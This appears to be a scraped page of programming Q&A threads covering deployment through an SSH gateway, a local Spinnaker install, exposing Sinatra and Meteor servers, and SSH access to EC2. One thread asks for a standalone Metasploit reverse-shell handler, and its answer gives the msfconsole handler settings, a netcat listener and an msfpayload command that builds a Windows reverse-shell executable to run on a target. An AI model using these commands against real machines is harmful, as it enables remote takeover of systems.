mina gem deploy through gateway - ruby

I am using the mina gem to deploy.
I have to go through a gateway in order to connect to my server.
I know that capistrano enables it.
Does any one know this config in mina?

I don't believe mina supports this; certainly, the source code doesn't indicate such an option. I was experimenting with using the set :ssh_options, '' syntax, but mina appends -t to the end of the command chain, which then gets sent to the wrong server. Considered changing the mina code, but it's probably simpler to shift the gateway connection to your local ssh client itself, and possibly to use the set :forward_agent, true command. To do such, you'd set something like this in your ~/.ssh/config:
Host finaldestination.example.com
ProxyCommand ssh user#gateway.example.com nc %h 22
ForwardAgent yes
Testing using my localhost as a gateway seems to show this as workable.
Hope this helps - although I realise it isn't exactly what you were asking. :)

Related

How to spin up spinnaker locally for the first time

How to spin up a local version of Spinnaker? This has been answered and addressed in detail here.
https://github.com/spinnaker/spinnaker/issues/1729
Ok, so I got it to work, but not without you valuable help! #lwander
So I'll leave the steps here for posterity.
Each line is a separate command in the command line, I've installed this on a virtual machine with a freshly installed Ubuntu 14.04 copy with nothing else than SSH. Then SSH as root, You will need to configure sshd on your console to allow root access.
https://askubuntu.com/questions/469143/how-to-enable-ssh-root-access-on-ubuntu-14-04
> curl -O https://raw.githubusercontent.com/spinnaker/halyard/master/install/stable/InstallHalyard.sh
created a user account member of the adm and sudo groups (is this necessary???)
then Install Halyard:
bash InstallHalyard.sh
Verify that HAL is installed and validate its version.
hal -v
Tell Hal that the deployment type will be as a local instance (this will publish all services in localhost which will be tricky later in order to access them, but I have a turnaround so keep reading)
hal config deploy edit --type localdebian
Hal will complain that a version has not been selected, just tell HAL which version:
hal config version edit --version 1.0.0
The tell HAL which storage you are going to use, in my case and since it is local I want to use redis.
hal config storage edit --type redis
So now we need to add a cloud provider to HAL, we use AWS so we add it like this:
hal config provider aws edit --access-key-idXXXXXXXXXXXXXXXXXXXX--secret-access-key
I created a user on AWS and added access keys to the user inside IAM on the user security credentials tab. Obviously my access-key-idis not XXXXXXXXXXXXXXXXXXXX, I edited it. You do not need to enter the secret-access-key because the command will prompt for it.
Then you need to create a username relative or that will only concern you spinnaker installation however this will get related to you AWS Account-ID, so in MY spinnaker local installation I chose the username spinnakermaster you should choose yours!. And my AWS Account ID is not YYYYYYYYYYYY, I've edited too.
All the configurations and steps that you'll need to do inside AWS for this to work are really well documented here:
[https://www.spinnaker.io/setup/providers/aws/](https://www.spinnaker.io/setup/providers/aws/
)
And to tell HAL of of the above here's the command:
hal config provider aws account add spinnakermaster --account-id YYYYYYYYYYYY --assume-role role/spinnakerManaged
And after all that and if everything went according to plan we can ask HAL to deploy our brand new spinnaker installation.
hal deploy apply
It will begin a long installation downloading and configuring all the services.
Once it has finished you may do whatever you like but in my case I created a monitoring script like the one described here:
https://github.com/spinnaker/spinnaker/issues/854
Which can be launched on a recursive manner as this:
watch -n1 spinnaker-status.shor until toctrl+Cit!.
then to be able to access your local VM spinnaker copy you can either setup a reverse proxy with the proxy server of your choice to forward all the requests to localhost or you can simply ssh the SH** out of this redirecting the ports;
ssh root#ZZZ.ZZZ.ZZZ.ZZZ -L 9000:127.0.0.1:9000 -L 8084:127.0.0.1:8084 -L 8083:127.0.0.1:8083 -L 7002:127.0.0.1:7002 -L 8087:127.0.0.1:8087 -L 8080:127.0.0.1:8080 -L 8088:127.0.0.1:8088 -L 8089:127.0.0.1:8089
Where obviously theZZZ.ZZZ.ZZZ.ZZZ is not an actual IP Address.
And finally to begin having fun with this cutie you have to go to your browser of choice and type into the address bar:
http://127.0.0.0:9000
Hope this helps and saves some time to everybody!.
Cheers.
EN

Standalone multi/handler reverse_tcp

Sorry for my english.
Using metasploit I generated an exploit for windows 7 with windows/shell/reverse_tcp payload.
Then I waiting connection using msfconsole:
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
I am successfully connected to command line of windows.
However I need to expect connection without using metasploit. I found how to create standalone module, but it was only for an exploit.
I need standalone multi/handler reverse_tcp or simply the code which listens to a certain port and then gives access to command line.
I don't really know what your constraints/restrictions are.
My guess is that, you want to "receive shells" on a computer without metasploit installed on it.If that's the case, you could use msfd(metasploit daemon installed on a different computer) or simply netcat,socat,...
What do you think of this:
listening with netcat on 192.168.1.2# nc -l -p 4444
Using a shell_reverse_tcp instead# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
Execute darkbird.exe on the target

Can't access sinatra server from other computers

I am running a sinatra server with shotgun that returns a hello world when request GET in the root (typical tutorial) and works perfectly in my computer. I could only access it from localhost:9393 and then i run it with -o 0.0.0.0 and could access it as IP:9393 but still only from the computer where the server was running.
How can i access the server from other computers? already tried bind 0.0.0.0 and environment production.
Thanks in advance.
A bit more information is needed, like the OS that you are running and if you have made sure that any local firewalls are not blocking your traffic. I see that you marked this with the "Shotgun" tag which tells me that you are running on a *nix system as Shotgun uses forks and windows doesn't support them.
Check your iptables and see if you got anything in there. :)
iptables -nvL -t nat --line-numbers
iptables -nvL --line-numbers

How to control where Meteor runs

I'm installing Meteor (framework) on my AWS EC2 (micro) instance and followed the instructions and after creating a test project I ran meteor on that directory giving me the expected
[[[[[ /var/www/html/meteortest ]]]]]
Running on: http://localhost:3000/
But I can't navigate to my server's localhost in my browser to see the hello world example project. Is there a way I can make meteor work on something like :
http://mydomain.com/meteortest/
or
http://mydomain.com/meteortest:3000
The way that Meteor sets the ROOT URL is by using an environment variable called ROOT_URL:
http://docs.meteor.com/#meteor_absoluteurl
So you could run your Meteor instance like so: ROOT_URL="http://mydomain.com/" meteor --port 80
However, if you want to have the meteor instance served from a folder (like http://mydomain.com/meteortest), you will have to use nginx to forward ports (see Tyr's example) but replace the line:
location / {
with:
location /meteortest {
and change your ROOT_URL appropriately. If you still can't access your domain from outside, you may have not set your security groups properly for EC2. You have to open up port 80. More information on how to do this can be here: http://docs.amazonwebservices.com/AWSEC2/latest/UserGuide/using-network-security.html
You can setup nginx to proxy port 3000 to your domain. Something like:
server {
listen 80;
server_name meteortest.mydomain.com;
access_log /var/log/nginx/meteortest.access.log;
error_log /var/log/nginx/tmeteortest.error.log;
location / {
proxy_pass http://localhost:3000;
include /etc/nginx/proxy_params;
}
}
Please see http://wiki.nginx.org/HttpProxyModule for more information.
However, running meteor on port 3000 is a development environment. If you want to use it in production, please run "meteor bundle", and then follow the README inside the generated tarball.
I think the problem is that port 3000 is likely blocked by amazon's firewall. You could look at opening it up, try Tyr's solution, or try just running meteor with
meteor --port 80
You may need root permissions (i.e. sudo) to do this.
Running directly on port 80 would require root privileges, which you don't really want your web server to run as -- starting it as root and deescalating to a regular user is possible, but not really ideal as well, as you may find that a programming bug at some time forgets to deescalate privs and you will not see any errors from that.
In many cases, I don't really want/need to run a load balancer to use multiple core, especially if I'm runnning on AWS single core t1 or t2 instance types, which I just scale out as I need them -- hence the best advice I have seen is to simply use the Linux kernels ability to do port forwarding, mapping port 80 to port 3000, like this
$ sudo iptables -A PREROUTING -t nat -i eth0 -p tcp \
--dport 80 -j REDIRECT --to-port 3000
Nice and easy and nothing else to do -- and super efficient at the same time as no extra processes are involved in serving the requests.

Help Accessing Amazon EC2 Instance

Trying to set up first EC2 instance for simple (currently) php app, using osx 10.6. When i try to access my new instance in the command line i can only get ssh: connect to host xx.xxx.xxx.xxx port 22: Operation timed out.
i'm typing this at command line:
ssh -i <MYPEMNAME>.pem ec2-user#<PRIVATEIP/PUBLICDNS/ELASTICIP>
i have this as a security rule in the management console:
rule name: web_access
22(SSH) 0.0.0.0
80(HTTP) 0.0.0.0
i have ssh completely open just to test this, i'll get a more appropriate ip when it works.
i created an elastic IP, which was one option i tried after 'ec2-user#...'
i also generated a .pem when i created the instance which i have saved to a folder .ec2 on my machine, named as referenced in .pem above.
the management console says the instance is running. i think im just doing the ssh access wrong at this point.
any help tremendously appreciated!
thanks
Yeah, comments were pretty correct. It was an ssh issue and the main thing was that i was trying to add a custom security rule that allowed ssh but the default didn't. and for whatever reason the custom rule wasn't being applied so i just edited the default rule to allow port 22 (ssh) and I was pretty much up and running. Also needed to run chmod. !! Anddd, if you add a new keypair like I did, you may need to go into the ssh/known_hosts file and delete reference to your old keypair. that was hanging me up for a while with a an error out a middleman attack.
thanks

Resources